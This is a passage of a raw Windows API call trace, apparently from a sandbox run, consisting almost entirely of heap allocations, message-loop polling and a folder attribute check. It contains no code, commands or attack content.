(lpMsg=0x144f084) returned 0 [0116.119] DispatchMessageW (lpMsg=0x144f084) returned 0x0 [0116.119] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0116.119] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0116.119] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0116.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0116.119] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0116.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0116.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0116.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0116.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0116.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0116.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0116.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0116.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0116.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0116.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e87e8 | out: hHeap=0x1780000) returned 1 [0116.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0116.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0116.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0116.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0116.120] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0116.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0116.120] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0116.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0116.120] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0116.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0116.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0116.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0116.120] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0116.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0116.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0116.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0116.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2570 [0116.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0116.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0116.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0116.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0116.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0116.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26c0 [0116.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0116.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0116.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0116.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0116.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25d0 [0116.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0116.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0116.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0116.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca2f8 [0116.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0116.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0116.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0116.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0116.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0116.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0116.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0116.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0116.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0116.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0116.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0116.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0116.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0116.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0116.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0116.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0116.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0116.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0116.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0116.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0116.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0116.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0116.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0116.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0116.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0116.121] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0116.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0116.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0116.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0116.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0116.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0116.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0116.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0116.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0116.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0116.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0116.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0116.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0116.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0116.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0116.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0116.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0116.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0116.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0116.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0116.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0116.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0116.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0116.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0116.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0116.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0116.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0116.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0116.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0116.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0116.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0116.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0116.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0116.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0116.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0116.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0116.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0116.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0116.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0116.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0116.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0116.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0116.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0116.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0116.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0116.123] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0116.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0116.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0116.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0116.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0116.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0116.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0116.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0116.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0116.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0116.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0116.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0116.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0116.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0116.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0116.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0116.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0116.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca730 [0116.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0116.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0116.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x5c) returned 0x43597f8 [0116.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0116.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0116.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0116.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0116.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0116.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0116.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359a68 [0116.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359a68 | out: hHeap=0x1780000) returned 1 [0116.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0116.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0116.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0116.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0116.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0116.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43596c0 | out: hHeap=0x1780000) returned 1 [0116.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0116.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0116.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0116.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0116.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0116.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0116.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0116.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0116.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0116.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0116.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0116.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x1b218f0 [0116.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43597f8 | out: hHeap=0x1780000) returned 1 [0116.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0116.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0116.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0116.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0116.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0116.125] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0116.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0116.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0116.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0116.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0116.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0116.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0116.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0116.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0116.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0116.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0116.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0116.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0116.125] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0116.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0116.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0116.125] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0116.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0116.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0116.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0116.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0116.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0116.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0116.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0116.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0116.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0116.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0116.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0116.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0116.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0116.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0116.126] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0116.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0116.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0116.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0116.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0116.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0116.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0116.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0116.126] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy")) returned 0x10 [0116.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0116.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0116.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0116.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0116.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0116.127] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0116.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0116.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0116.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0116.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0116.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0116.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0116.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0116.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0116.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0116.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0116.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0116.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0116.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca568 [0116.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0116.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0116.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0116.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0116.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0116.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0116.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0116.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0116.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0116.127] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 